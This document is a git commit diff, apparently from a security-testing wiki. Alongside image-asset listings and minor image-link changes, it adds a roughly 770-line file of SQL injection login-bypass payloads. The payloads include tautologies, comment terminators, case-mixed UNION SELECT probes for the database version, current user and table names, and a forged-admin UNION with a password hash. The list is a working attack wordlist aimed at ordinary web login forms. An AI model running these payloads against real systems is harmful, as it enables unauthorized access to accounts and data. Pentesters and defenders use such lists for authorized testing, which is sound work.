GitBook: [#3128] No subject
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 72 KiB |
After Width: | Height: | Size: 93 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 13 KiB |
BIN
.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1).png
Normal file
After Width: | Height: | Size: 766 KiB |
BIN
.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (2).png
Normal file
After Width: | Height: | Size: 766 KiB |
After Width: | Height: | Size: 142 KiB |
After Width: | Height: | Size: 142 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 1.3 MiB |
After Width: | Height: | Size: 1.3 MiB |
After Width: | Height: | Size: 1.3 MiB |
After Width: | Height: | Size: 740 KiB |
BIN
.gitbook/assets/image (620) (1) (1) (1).png
Normal file
After Width: | Height: | Size: 24 KiB |
BIN
.gitbook/assets/image (638) (1) (1) (1).png
Normal file
After Width: | Height: | Size: 137 KiB |
BIN
.gitbook/assets/image (638) (1) (1) (2).png
Normal file
After Width: | Height: | Size: 137 KiB |
771
.gitbook/assets/sqli-authbypass-big (1) (1).txt
Normal file
|
@ -0,0 +1,771 @@
|
|||
'-'
|
||||
' '
|
||||
'&'
|
||||
'^'
|
||||
'*'
|
||||
' or ''-'
|
||||
' or '' '
|
||||
' or ''&'
|
||||
' or ''^'
|
||||
' or ''*'
|
||||
"-"
|
||||
" "
|
||||
"&"
|
||||
"^"
|
||||
"*"
|
||||
" or ""-"
|
||||
" or "" "
|
||||
" or ""&"
|
||||
" or ""^"
|
||||
" or ""*"
|
||||
or true--
|
||||
" or true--
|
||||
' or true--
|
||||
") or true--
|
||||
') or true--
|
||||
' or 'x'='x
|
||||
') or ('x')=('x
|
||||
')) or (('x'))=(('x
|
||||
" or "x"="x
|
||||
") or ("x")=("x
|
||||
")) or (("x"))=(("x
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1#
|
||||
or 1=1/*
|
||||
admin' --
|
||||
admin' #
|
||||
admin'/*
|
||||
admin' or '1'='1
|
||||
admin' or '1'='1'--
|
||||
admin' or '1'='1'#
|
||||
admin' or '1'='1'/*
|
||||
admin'or 1=1 or ''='
|
||||
admin' or 1=1
|
||||
admin' or 1=1--
|
||||
admin' or 1=1#
|
||||
admin' or 1=1/*
|
||||
admin') or ('1'='1
|
||||
admin') or ('1'='1'--
|
||||
admin') or ('1'='1'#
|
||||
admin') or ('1'='1'/*
|
||||
admin') or '1'='1
|
||||
admin') or '1'='1'--
|
||||
admin') or '1'='1'#
|
||||
admin') or '1'='1'/*
|
||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
admin" --
|
||||
admin" #
|
||||
admin"/*
|
||||
admin" or "1"="1
|
||||
admin" or "1"="1"--
|
||||
admin" or "1"="1"#
|
||||
admin" or "1"="1"/*
|
||||
admin"or 1=1 or ""="
|
||||
admin" or 1=1
|
||||
admin" or 1=1--
|
||||
admin" or 1=1#
|
||||
admin" or 1=1/*
|
||||
admin") or ("1"="1
|
||||
admin") or ("1"="1"--
|
||||
admin") or ("1"="1"#
|
||||
admin") or ("1"="1"/*
|
||||
admin") or "1"="1
|
||||
admin") or "1"="1"--
|
||||
admin") or "1"="1"#
|
||||
admin") or "1"="1"/*
|
||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
==
|
||||
=
|
||||
'
|
||||
' --
|
||||
' #
|
||||
' –
|
||||
'--
|
||||
'/*
|
||||
'#
|
||||
" --
|
||||
" #
|
||||
"/*
|
||||
' and 1='1
|
||||
' and a='a
|
||||
or 1=1
|
||||
or true
|
||||
' or ''='
|
||||
" or ""="
|
||||
1′) and '1′='1–
|
||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
and 1=1
|
||||
and 1=1–
|
||||
' and 'one'='one
|
||||
' and 'one'='one–
|
||||
' group by password having 1=1--
|
||||
' group by userid having 1=1--
|
||||
' group by username having 1=1--
|
||||
like '%'
|
||||
or 0=0 --
|
||||
or 0=0 #
|
||||
or 0=0 –
|
||||
' or 0=0 #
|
||||
' or 0=0 --
|
||||
' or 0=0 #
|
||||
' or 0=0 –
|
||||
" or 0=0 --
|
||||
" or 0=0 #
|
||||
" or 0=0 –
|
||||
%' or '0'='0
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1/*
|
||||
or 1=1#
|
||||
or 1=1–
|
||||
' or 1=1--
|
||||
' or '1'='1
|
||||
' or '1'='1'--
|
||||
' or '1'='1'/*
|
||||
' or '1'='1'#
|
||||
' or '1′='1
|
||||
' or 1=1
|
||||
' or 1=1 --
|
||||
' or 1=1 –
|
||||
' or 1=1--
|
||||
' or 1=1;#
|
||||
' or 1=1/*
|
||||
' or 1=1#
|
||||
' or 1=1–
|
||||
') or '1'='1
|
||||
') or '1'='1--
|
||||
') or '1'='1'--
|
||||
') or '1'='1'/*
|
||||
') or '1'='1'#
|
||||
') or ('1'='1
|
||||
') or ('1'='1--
|
||||
') or ('1'='1'--
|
||||
') or ('1'='1'/*
|
||||
') or ('1'='1'#
|
||||
'or'1=1
|
||||
'or'1=1′
|
||||
" or "1"="1
|
||||
" or "1"="1"--
|
||||
" or "1"="1"/*
|
||||
" or "1"="1"#
|
||||
" or 1=1
|
||||
" or 1=1 --
|
||||
" or 1=1 –
|
||||
" or 1=1--
|
||||
" or 1=1/*
|
||||
" or 1=1#
|
||||
" or 1=1–
|
||||
") or "1"="1
|
||||
") or "1"="1"--
|
||||
") or "1"="1"/*
|
||||
") or "1"="1"#
|
||||
") or ("1"="1
|
||||
") or ("1"="1"--
|
||||
") or ("1"="1"/*
|
||||
") or ("1"="1"#
|
||||
) or '1′='1–
|
||||
) or ('1′='1–
|
||||
' or 1=1 LIMIT 1;#
|
||||
'or 1=1 or ''='
|
||||
"or 1=1 or ""="
|
||||
' or 'a'='a
|
||||
' or a=a--
|
||||
' or a=a–
|
||||
') or ('a'='a
|
||||
" or "a"="a
|
||||
") or ("a"="a
|
||||
') or ('a'='a and hi") or ("a"="a
|
||||
' or 'one'='one
|
||||
' or 'one'='one–
|
||||
' or uid like '%
|
||||
' or uname like '%
|
||||
' or userid like '%
|
||||
' or user like '%
|
||||
' or username like '%
|
||||
' or 'x'='x
|
||||
') or ('x'='x
|
||||
" or "x"="x
|
||||
' OR 'x'='x'#;
|
||||
'=' 'or' and '=' 'or'
|
||||
' UNION ALL SELECT 1, @@version;#
|
||||
' UNION ALL SELECT system_user(),user();#
|
||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
||||
admin' and substring(password/text(),1,1)='7
|
||||
' and substring(password/text(),1,1)='7
|
||||
|
||||
==
|
||||
=
|
||||
'
|
||||
"
|
||||
'-- 2
|
||||
'/*
|
||||
'#
|
||||
"-- 2
|
||||
" #
|
||||
"/*
|
||||
'-'
|
||||
'&'
|
||||
'^'
|
||||
'*'
|
||||
'='
|
||||
0'<'2
|
||||
"-"
|
||||
"&"
|
||||
"^"
|
||||
"*"
|
||||
"="
|
||||
0"<"2
|
||||
|
||||
')
|
||||
")
|
||||
')-- 2
|
||||
')/*
|
||||
')#
|
||||
")-- 2
|
||||
") #
|
||||
")/*
|
||||
')-('
|
||||
')&('
|
||||
')^('
|
||||
')*('
|
||||
')=('
|
||||
0')<('2
|
||||
")-("
|
||||
")&("
|
||||
")^("
|
||||
")*("
|
||||
")=("
|
||||
0")<("2
|
||||
|
||||
'-''-- 2
|
||||
'-''#
|
||||
'-''/*
|
||||
'&''-- 2
|
||||
'&''#
|
||||
'&''/*
|
||||
'^''-- 2
|
||||
'^''#
|
||||
'^''/*
|
||||
'*''-- 2
|
||||
'*''#
|
||||
'*''/*
|
||||
'=''-- 2
|
||||
'=''#
|
||||
'=''/*
|
||||
0'<'2'-- 2
|
||||
0'<'2'#
|
||||
0'<'2'/*
|
||||
"-""-- 2
|
||||
"-""#
|
||||
"-""/*
|
||||
"&""-- 2
|
||||
"&""#
|
||||
"&""/*
|
||||
"^""-- 2
|
||||
"^""#
|
||||
"^""/*
|
||||
"*""-- 2
|
||||
"*""#
|
||||
"*""/*
|
||||
"=""-- 2
|
||||
"=""#
|
||||
"=""/*
|
||||
0"<"2"-- 2
|
||||
0"<"2"#
|
||||
0"<"2"/*
|
||||
|
||||
')-''-- 2
|
||||
')-''#
|
||||
')-''/*
|
||||
')&''-- 2
|
||||
')&''#
|
||||
')&''/*
|
||||
')^''-- 2
|
||||
')^''#
|
||||
')^''/*
|
||||
')*''-- 2
|
||||
')*''#
|
||||
')*''/*
|
||||
')=''-- 2
|
||||
')=''#
|
||||
')=''/*
|
||||
0')<'2'-- 2
|
||||
0')<'2'#
|
||||
0')<'2'/*
|
||||
")-""-- 2
|
||||
")-""#
|
||||
")-""/*
|
||||
")&""-- 2
|
||||
")&""#
|
||||
")&""/*
|
||||
")^""-- 2
|
||||
")^""#
|
||||
")^""/*
|
||||
")*""-- 2
|
||||
")*""#
|
||||
")*""/*
|
||||
")=""-- 2
|
||||
")=""#
|
||||
")=""/*
|
||||
0")<"2-- 2
|
||||
0")<"2#
|
||||
0")<"2/*
|
||||
|
||||
|
||||
'oR'2
|
||||
'oR'2'-- 2
|
||||
'oR'2'#
|
||||
'oR'2'/*
|
||||
'oR'2'oR'
|
||||
'oR(2)-- 2
|
||||
'oR(2)#
|
||||
'oR(2)/*
|
||||
'oR(2)oR'
|
||||
'oR 2-- 2
|
||||
'oR 2#
|
||||
'oR 2/*
|
||||
'oR 2 oR'
|
||||
'oR/**/2-- 2
|
||||
'oR/**/2#
|
||||
'oR/**/2/*
|
||||
'oR/**/2/**/oR'
|
||||
"oR"2
|
||||
"oR"2"-- 2
|
||||
"oR"2"#
|
||||
"oR"2"/*
|
||||
"oR"2"oR"
|
||||
"oR(2)-- 2
|
||||
"oR(2)#
|
||||
"oR(2)/*
|
||||
"oR(2)oR"
|
||||
"oR 2-- 2
|
||||
"oR 2#
|
||||
"oR 2/*
|
||||
"oR 2 oR"
|
||||
"oR/**/2-- 2
|
||||
"oR/**/2#
|
||||
"oR/**/2/*
|
||||
"oR/**/2/**/oR"
|
||||
|
||||
'oR'2'='2
|
||||
'oR'2'='2'oR'
|
||||
'oR'2'='2'-- 2
|
||||
'oR'2'='2'#
|
||||
'oR'2'='2'/*
|
||||
'oR'2'='2'oR'
|
||||
'oR 2=2-- 2
|
||||
'oR 2=2#
|
||||
'oR 2=2/*
|
||||
'oR 2=2 oR'
|
||||
'oR/**/2=2-- 2
|
||||
'oR/**/2=2#
|
||||
'oR/**/2=2/*
|
||||
'oR/**/2=2/**/oR'
|
||||
'oR(2)=2-- 2
|
||||
'oR(2)=2#
|
||||
'oR(2)=2/*
|
||||
'oR(2)=2/*
|
||||
'oR(2)=(2)oR'
|
||||
'oR'2'='2' LimIT 1-- 2
|
||||
'oR'2'='2' LimIT 1#
|
||||
'oR'2'='2' LimIT 1/*
|
||||
'oR(2)=(2)LimIT(1)-- 2
|
||||
'oR(2)=(2)LimIT(1)#
|
||||
'oR(2)=(2)LimIT(1)/*
|
||||
"oR"2"="2
|
||||
"oR"2"="2"oR"
|
||||
"oR"2"="2"-- 2
|
||||
"oR"2"="2"#
|
||||
"oR"2"="2"/*
|
||||
"oR"2"="2"oR"
|
||||
"oR 2=2-- 2
|
||||
"oR 2=2#
|
||||
"oR 2=2/*
|
||||
"oR 2=2 oR"
|
||||
"oR/**/2=2-- 2
|
||||
"oR/**/2=2#
|
||||
"oR/**/2=2/*
|
||||
"oR/**/2=2/**/oR"
|
||||
"oR(2)=2-- 2
|
||||
"oR(2)=2#
|
||||
"oR(2)=2/*
|
||||
"oR(2)=2/*
|
||||
"oR(2)=(2)oR"
|
||||
"oR"2"="2" LimIT 1-- 2
|
||||
"oR"2"="2" LimIT 1#
|
||||
"oR"2"="2" LimIT 1/*
|
||||
"oR(2)=(2)LimIT(1)-- 2
|
||||
"oR(2)=(2)LimIT(1)#
|
||||
"oR(2)=(2)LimIT(1)/*
|
||||
|
||||
'oR true-- 2
|
||||
'oR true#
|
||||
'oR true/*
|
||||
'oR true oR'
|
||||
'oR(true)-- 2
|
||||
'oR(true)#
|
||||
'oR(true)/*
|
||||
'oR(true)oR'
|
||||
'oR/**/true-- 2
|
||||
'oR/**/true#
|
||||
'oR/**/true/*
|
||||
'oR/**/true/**/oR'
|
||||
"oR true-- 2
|
||||
"oR true#
|
||||
"oR true/*
|
||||
"oR true oR"
|
||||
"oR(true)-- 2
|
||||
"oR(true)#
|
||||
"oR(true)/*
|
||||
"oR(true)oR"
|
||||
"oR/**/true-- 2
|
||||
"oR/**/true#
|
||||
"oR/**/true/*
|
||||
"oR/**/true/**/oR"
|
||||
|
||||
'oR'2'LiKE'2
|
||||
'oR'2'LiKE'2'-- 2
|
||||
'oR'2'LiKE'2'#
|
||||
'oR'2'LiKE'2'/*
|
||||
'oR'2'LiKE'2'oR'
|
||||
'oR(2)LiKE(2)-- 2
|
||||
'oR(2)LiKE(2)#
|
||||
'oR(2)LiKE(2)/*
|
||||
'oR(2)LiKE(2)oR'
|
||||
"oR"2"LiKE"2
|
||||
"oR"2"LiKE"2"-- 2
|
||||
"oR"2"LiKE"2"#
|
||||
"oR"2"LiKE"2"/*
|
||||
"oR"2"LiKE"2"oR"
|
||||
"oR(2)LiKE(2)-- 2
|
||||
"oR(2)LiKE(2)#
|
||||
"oR(2)LiKE(2)/*
|
||||
"oR(2)LiKE(2)oR"
|
||||
|
||||
admin
|
||||
admin'-- 2
|
||||
admin'#
|
||||
admin'/*
|
||||
admin"-- 2
|
||||
admin"#
|
||||
ffifdyop
|
||||
|
||||
' UniON SElecT 1,2-- 2
|
||||
' UniON SElecT 1,2,3-- 2
|
||||
' UniON SElecT 1,2,3,4-- 2
|
||||
' UniON SElecT 1,2,3,4,5-- 2
|
||||
' UniON SElecT 1,2#
|
||||
' UniON SElecT 1,2,3#
|
||||
' UniON SElecT 1,2,3,4#
|
||||
' UniON SElecT 1,2,3,4,5#
|
||||
'UniON(SElecT(1),2)-- 2
|
||||
'UniON(SElecT(1),2,3)-- 2
|
||||
'UniON(SElecT(1),2,3,4)-- 2
|
||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
||||
'UniON(SElecT(1),2)#
|
||||
'UniON(SElecT(1),2,3)#
|
||||
'UniON(SElecT(1),2,3,4)#
|
||||
'UniON(SElecT(1),2,3,4,5)#
|
||||
" UniON SElecT 1,2-- 2
|
||||
" UniON SElecT 1,2,3-- 2
|
||||
" UniON SElecT 1,2,3,4-- 2
|
||||
" UniON SElecT 1,2,3,4,5-- 2
|
||||
" UniON SElecT 1,2#
|
||||
" UniON SElecT 1,2,3#
|
||||
" UniON SElecT 1,2,3,4#
|
||||
" UniON SElecT 1,2,3,4,5#
|
||||
"UniON(SElecT(1),2)-- 2
|
||||
"UniON(SElecT(1),2,3)-- 2
|
||||
"UniON(SElecT(1),2,3,4)-- 2
|
||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
||||
"UniON(SElecT(1),2)#
|
||||
"UniON(SElecT(1),2,3)#
|
||||
"UniON(SElecT(1),2,3,4)#
|
||||
"UniON(SElecT(1),2,3,4,5)#
|
||||
|
||||
'||'2
|
||||
'||2-- 2
|
||||
'||'2'||'
|
||||
'||2#
|
||||
'||2/*
|
||||
'||2||'
|
||||
"||"2
|
||||
"||2-- 2
|
||||
"||"2"||"
|
||||
"||2#
|
||||
"||2/*
|
||||
"||2||"
|
||||
'||'2'='2
|
||||
'||'2'='2'||'
|
||||
'||2=2-- 2
|
||||
'||2=2#
|
||||
'||2=2/*
|
||||
'||2=2||'
|
||||
"||"2"="2
|
||||
"||"2"="2"||"
|
||||
"||2=2-- 2
|
||||
"||2=2#
|
||||
"||2=2/*
|
||||
"||2=2||"
|
||||
'||2=(2)LimIT(1)-- 2
|
||||
'||2=(2)LimIT(1)#
|
||||
'||2=(2)LimIT(1)/*
|
||||
"||2=(2)LimIT(1)-- 2
|
||||
"||2=(2)LimIT(1)#
|
||||
"||2=(2)LimIT(1)/*
|
||||
'||true-- 2
|
||||
'||true#
|
||||
'||true/*
|
||||
'||true||'
|
||||
"||true-- 2
|
||||
"||true#
|
||||
"||true/*
|
||||
"||true||"
|
||||
'||'2'LiKE'2
|
||||
'||'2'LiKE'2'-- 2
|
||||
'||'2'LiKE'2'#
|
||||
'||'2'LiKE'2'/*
|
||||
'||'2'LiKE'2'||'
|
||||
'||(2)LiKE(2)-- 2
|
||||
'||(2)LiKE(2)#
|
||||
'||(2)LiKE(2)/*
|
||||
'||(2)LiKE(2)||'
|
||||
"||"2"LiKE"2
|
||||
"||"2"LiKE"2"-- 2
|
||||
"||"2"LiKE"2"#
|
||||
"||"2"LiKE"2"/*
|
||||
"||"2"LiKE"2"||"
|
||||
"||(2)LiKE(2)-- 2
|
||||
"||(2)LiKE(2)#
|
||||
"||(2)LiKE(2)/*
|
||||
"||(2)LiKE(2)||"
|
||||
|
||||
')oR('2
|
||||
')oR'2'-- 2
|
||||
')oR'2'#
|
||||
')oR'2'/*
|
||||
')oR'2'oR('
|
||||
')oR(2)-- 2
|
||||
')oR(2)#
|
||||
')oR(2)/*
|
||||
')oR(2)oR('
|
||||
')oR 2-- 2
|
||||
')oR 2#
|
||||
')oR 2/*
|
||||
')oR 2 oR('
|
||||
')oR/**/2-- 2
|
||||
')oR/**/2#
|
||||
')oR/**/2/*
|
||||
')oR/**/2/**/oR('
|
||||
")oR("2
|
||||
")oR"2"-- 2
|
||||
")oR"2"#
|
||||
")oR"2"/*
|
||||
")oR"2"oR("
|
||||
")oR(2)-- 2
|
||||
")oR(2)#
|
||||
")oR(2)/*
|
||||
")oR(2)oR("
|
||||
")oR 2-- 2
|
||||
")oR 2#
|
||||
")oR 2/*
|
||||
")oR 2 oR("
|
||||
")oR/**/2-- 2
|
||||
")oR/**/2#
|
||||
")oR/**/2/*
|
||||
")oR/**/2/**/oR("
|
||||
')oR'2'=('2
|
||||
')oR'2'='2'oR('
|
||||
')oR'2'='2'-- 2
|
||||
')oR'2'='2'#
|
||||
')oR'2'='2'/*
|
||||
')oR'2'='2'oR('
|
||||
')oR 2=2-- 2
|
||||
')oR 2=2#
|
||||
')oR 2=2/*
|
||||
')oR 2=2 oR('
|
||||
')oR/**/2=2-- 2
|
||||
')oR/**/2=2#
|
||||
')oR/**/2=2/*
|
||||
')oR/**/2=2/**/oR('
|
||||
')oR(2)=2-- 2
|
||||
')oR(2)=2#
|
||||
')oR(2)=2/*
|
||||
')oR(2)=2/*
|
||||
')oR(2)=(2)oR('
|
||||
')oR'2'='2' LimIT 1-- 2
|
||||
')oR'2'='2' LimIT 1#
|
||||
')oR'2'='2' LimIT 1/*
|
||||
')oR(2)=(2)LimIT(1)-- 2
|
||||
')oR(2)=(2)LimIT(1)#
|
||||
')oR(2)=(2)LimIT(1)/*
|
||||
")oR"2"=("2
|
||||
")oR"2"="2"oR("
|
||||
")oR"2"="2"-- 2
|
||||
")oR"2"="2"#
|
||||
")oR"2"="2"/*
|
||||
")oR"2"="2"oR("
|
||||
")oR 2=2-- 2
|
||||
")oR 2=2#
|
||||
")oR 2=2/*
|
||||
")oR 2=2 oR("
|
||||
")oR/**/2=2-- 2
|
||||
")oR/**/2=2#
|
||||
")oR/**/2=2/*
|
||||
")oR/**/2=2/**/oR("
|
||||
")oR(2)=2-- 2
|
||||
")oR(2)=2#
|
||||
")oR(2)=2/*
|
||||
")oR(2)=2/*
|
||||
")oR(2)=(2)oR("
|
||||
")oR"2"="2" LimIT 1-- 2
|
||||
")oR"2"="2" LimIT 1#
|
||||
")oR"2"="2" LimIT 1/*
|
||||
")oR(2)=(2)LimIT(1)-- 2
|
||||
")oR(2)=(2)LimIT(1)#
|
||||
")oR(2)=(2)LimIT(1)/*
|
||||
')oR true-- 2
|
||||
')oR true#
|
||||
')oR true/*
|
||||
')oR true oR('
|
||||
')oR(true)-- 2
|
||||
')oR(true)#
|
||||
')oR(true)/*
|
||||
')oR(true)oR('
|
||||
')oR/**/true-- 2
|
||||
')oR/**/true#
|
||||
')oR/**/true/*
|
||||
')oR/**/true/**/oR('
|
||||
")oR true-- 2
|
||||
")oR true#
|
||||
")oR true/*
|
||||
")oR true oR("
|
||||
")oR(true)-- 2
|
||||
")oR(true)#
|
||||
")oR(true)/*
|
||||
")oR(true)oR("
|
||||
")oR/**/true-- 2
|
||||
")oR/**/true#
|
||||
")oR/**/true/*
|
||||
")oR/**/true/**/oR("
|
||||
')oR'2'LiKE('2
|
||||
')oR'2'LiKE'2'-- 2
|
||||
')oR'2'LiKE'2'#
|
||||
')oR'2'LiKE'2'/*
|
||||
')oR'2'LiKE'2'oR('
|
||||
')oR(2)LiKE(2)-- 2
|
||||
')oR(2)LiKE(2)#
|
||||
')oR(2)LiKE(2)/*
|
||||
')oR(2)LiKE(2)oR('
|
||||
")oR"2"LiKE("2
|
||||
")oR"2"LiKE"2"-- 2
|
||||
")oR"2"LiKE"2"#
|
||||
")oR"2"LiKE"2"/*
|
||||
")oR"2"LiKE"2"oR("
|
||||
")oR(2)LiKE(2)-- 2
|
||||
")oR(2)LiKE(2)#
|
||||
")oR(2)LiKE(2)/*
|
||||
")oR(2)LiKE(2)oR("
|
||||
admin')-- 2
|
||||
admin')#
|
||||
admin')/*
|
||||
admin")-- 2
|
||||
admin")#
|
||||
') UniON SElecT 1,2-- 2
|
||||
') UniON SElecT 1,2,3-- 2
|
||||
') UniON SElecT 1,2,3,4-- 2
|
||||
') UniON SElecT 1,2,3,4,5-- 2
|
||||
') UniON SElecT 1,2#
|
||||
') UniON SElecT 1,2,3#
|
||||
') UniON SElecT 1,2,3,4#
|
||||
') UniON SElecT 1,2,3,4,5#
|
||||
')UniON(SElecT(1),2)-- 2
|
||||
')UniON(SElecT(1),2,3)-- 2
|
||||
')UniON(SElecT(1),2,3,4)-- 2
|
||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
||||
')UniON(SElecT(1),2)#
|
||||
')UniON(SElecT(1),2,3)#
|
||||
')UniON(SElecT(1),2,3,4)#
|
||||
')UniON(SElecT(1),2,3,4,5)#
|
||||
") UniON SElecT 1,2-- 2
|
||||
") UniON SElecT 1,2,3-- 2
|
||||
") UniON SElecT 1,2,3,4-- 2
|
||||
") UniON SElecT 1,2,3,4,5-- 2
|
||||
") UniON SElecT 1,2#
|
||||
") UniON SElecT 1,2,3#
|
||||
") UniON SElecT 1,2,3,4#
|
||||
") UniON SElecT 1,2,3,4,5#
|
||||
")UniON(SElecT(1),2)-- 2
|
||||
")UniON(SElecT(1),2,3)-- 2
|
||||
")UniON(SElecT(1),2,3,4)-- 2
|
||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
||||
")UniON(SElecT(1),2)#
|
||||
")UniON(SElecT(1),2,3)#
|
||||
")UniON(SElecT(1),2,3,4)#
|
||||
")UniON(SElecT(1),2,3,4,5)#
|
||||
')||('2
|
||||
')||2-- 2
|
||||
')||'2'||('
|
||||
')||2#
|
||||
')||2/*
|
||||
')||2||('
|
||||
")||("2
|
||||
")||2-- 2
|
||||
")||"2"||("
|
||||
")||2#
|
||||
")||2/*
|
||||
")||2||("
|
||||
')||'2'=('2
|
||||
')||'2'='2'||('
|
||||
')||2=2-- 2
|
||||
')||2=2#
|
||||
')||2=2/*
|
||||
')||2=2||('
|
||||
")||"2"=("2
|
||||
")||"2"="2"||("
|
||||
")||2=2-- 2
|
||||
")||2=2#
|
||||
")||2=2/*
|
||||
")||2=2||("
|
||||
')||2=(2)LimIT(1)-- 2
|
||||
')||2=(2)LimIT(1)#
|
||||
')||2=(2)LimIT(1)/*
|
||||
")||2=(2)LimIT(1)-- 2
|
||||
")||2=(2)LimIT(1)#
|
||||
")||2=(2)LimIT(1)/*
|
||||
')||true-- 2
|
||||
')||true#
|
||||
')||true/*
|
||||
')||true||('
|
||||
")||true-- 2
|
||||
")||true#
|
||||
")||true/*
|
||||
")||true||("
|
||||
')||'2'LiKE('2
|
||||
')||'2'LiKE'2'-- 2
|
||||
')||'2'LiKE'2'#
|
||||
')||'2'LiKE'2'/*
|
||||
')||'2'LiKE'2'||('
|
||||
')||(2)LiKE(2)-- 2
|
||||
')||(2)LiKE(2)#
|
||||
')||(2)LiKE(2)/*
|
||||
')||(2)LiKE(2)||('
|
||||
")||"2"LiKE("2
|
||||
")||"2"LiKE"2"-- 2
|
||||
")||"2"LiKE"2"#
|
||||
")||"2"LiKE"2"/*
|
||||
")||"2"LiKE"2"||("
|
||||
")||(2)LiKE(2)-- 2
|
||||
")||(2)LiKE(2)#
|
||||
")||(2)LiKE(2)/*
|
||||
")||(2)LiKE(2)||("
|
||||
' UnION SELeCT 1,2`
|
||||
' UnION SELeCT 1,2,3`
|
||||
' UnION SELeCT 1,2,3,4`
|
||||
' UnION SELeCT 1,2,3,4,5`
|
||||
" UnION SELeCT 1,2`
|
||||
" UnION SELeCT 1,2,3`
|
||||
" UnION SELeCT 1,2,3,4`
|
||||
" UnION SELeCT 1,2,3,4,5`
|
|
@ -10,7 +10,7 @@ dht udp "DHT Nodes"
|
|||
|
||||
![](<.gitbook/assets/image (273).png>)
|
||||
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1).png>)
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
InfluxDB
|
||||
|
||||
|
|
|
@ -42,7 +42,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
|
|||
|
||||
### [**INE**](https://ine.com)
|
||||
|
||||
![](<.gitbook/assets/INE\_Logo (3).jpg>)
|
||||
![](.gitbook/assets/ine\_logo-3-.jpg)
|
||||
|
||||
[**INE**](https://ine.com) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com)**.**
|
||||
|
||||
|
|
|
@ -287,7 +287,7 @@ Moreover, if you don't have configured in the **branch protection** to ask to **
|
|||
|
||||
This is the **setting** in Github branch protections:
|
||||
|
||||
![](<../.gitbook/assets/image (307).png>)
|
||||
![](<../.gitbook/assets/image (375) (1).png>)
|
||||
|
||||
### Webhook Secret
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
## Architecture
|
||||
|
||||
![](<../../.gitbook/assets/image (307) (3) (1).png>)
|
||||
![](<../../.gitbook/assets/image (651) (1).png>)
|
||||
|
||||
### ATC: web UI & build scheduler
|
||||
|
||||
|
|
|
@ -17,7 +17,7 @@ Note that other cloud resources could be searched for and that some times these
|
|||
|
||||
As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...).
|
||||
|
||||
![](<../../.gitbook/assets/image (618).png>)
|
||||
![](<../../.gitbook/assets/image (628) (1) (1) (1).png>)
|
||||
|
||||
The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names:
|
||||
|
||||
|
|
|
@ -8,7 +8,7 @@ This machine was categorised as easy and it was pretty easy.
|
|||
|
||||
I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
|
||||
|
||||
![](<../../.gitbook/assets/image (79) (1).png>)
|
||||
![](<../../.gitbook/assets/image (79) (2).png>)
|
||||
|
||||
In as you can see 2 ports are open: 80 (**HTTP**) and 22 (**SSH**)
|
||||
|
||||
|
|
|
@ -387,7 +387,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`**
|
|||
|
||||
Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT`
|
||||
|
||||
![](<../../.gitbook/assets/image (620).png>)
|
||||
![](<../../.gitbook/assets/image (620) (1) (1).png>)
|
||||
|
||||
Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table:
|
||||
|
||||
|
@ -456,7 +456,7 @@ For example, in the following situation there is a **local variable in the stack
|
|||
|
||||
So, flag is in **0xffffcf4c**
|
||||
|
||||
![](<../../.gitbook/assets/image (622).png>)
|
||||
![](<../../.gitbook/assets/image (618) (2).png>)
|
||||
|
||||
And from the leak you can see the **pointer to the flag** is in the **8th** parameter:
|
||||
|
||||
|
|
|
@ -47,7 +47,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
|
|||
|
||||
